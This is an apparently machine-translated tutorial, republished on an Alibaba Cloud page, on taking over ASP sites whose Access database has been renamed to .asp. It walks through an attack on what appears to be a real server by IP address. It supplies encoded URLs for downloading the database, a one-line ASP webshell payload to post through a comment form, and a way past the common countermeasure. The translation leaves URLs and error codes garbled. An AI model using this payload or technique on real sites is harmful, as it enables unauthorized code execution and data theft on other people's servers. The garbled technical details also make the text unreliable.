Disaster caused by changing MDB to ASP

Source: Internet
Author: User

It may be that with the development of network security technology, the quality of administrators is improving. When using the access + ASP system, the MDB is changed to ASP or ASA for non-database downloads. If you do not directly change the suffix, you can directly download it using tools such as quickshield. In fact, you have opened the door for intruders. Intruders can use a database suffixed with ASP/ASA to directly obtain webshells.

I. Ideas

As we all know, <%> is the identifier of the ASP file. That is to say, an ASP file only executes code between <%>, all data in the access + ASP Web system is stored in the database file (MDB file). Because the Administrator changes the MDB file to an ASP file, if the submitted data contains <%>, the code between <%> is executed when we access the ASP database. As a result, we only submit malicious code to the database, so the database with the ASP suffix is our webshell.

Ii. Example

Find a target at will. First, let's use a database with an ASP Suffix:
Http: // 220.170.151.103/test/dlog % 5cshowlog. asp? Cat_id = 5 & log_id = 210

Return Value:

Microsoft VBScript compiler error: '800a03f6'
'End' missing'

/IISHelp/common/500-100.asp, row 242

Microsoft Jet Database Engine error '20140901'

'D:/log_mdb/% 29dlog_mdb % 29. asp 'is not a valid path. Check whether the path name is correctly spelled and whether it is connected to the server where the file is stored.

/Test/Conn. asp, Row 18

We submit: http: // 220.170.151.103/test/dlog/log_mdb/% 2529dlog_mdb % 2529. ASP returns a bunch of garbled characters so that we can directly download the database using tools such as Internet Express (which we will not discuss here ). On the homepage, we can see that the "user comments" function is provided. We registered a user and sent a comment:

<% Execute request ("B") %>

In this way, the ASP code <% execute request ("B") %> is written to the database, so the database is our webshell. Submit: http: // 220.170.151.103/test/dlog/log_mdb/% 2529dlog_mdb % 2529. asp at the end of the Garbled text, we can see:

/IISHelp/common/500-100.asp, row 242
Microsoft VBScript runtime error '800a000d'

Type Mismatch: 'execute'

/Test/dlog/log_mdb/% 29dlog_mdb % 29.asp, row 1266

The inserted code is running. For example:

Note: When submitting code to the database, the Code content cannot be too large. Therefore, we use <% execute request ("B") %>.

Iii. Other questions and ideas

1. if the suffix is changed to ASP, illegal ASP Code such as <% = 'a'-1%> is added to the database to completely prevent the downloaded database, because there is illegal ASP code in it, inserting our webshell code and running it will only display the previous error of illegal code, rather than executing our shell code. Although this can prevent certain attacks, there are still some hidden risks. We only need to add the compatible error code before the error code, the inserted webshell code is displayed correctly.

2. for MDB files that do not have a suffix changed, we can download the background password and enter the background. We can use the database backup to change the suffix to ASP.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.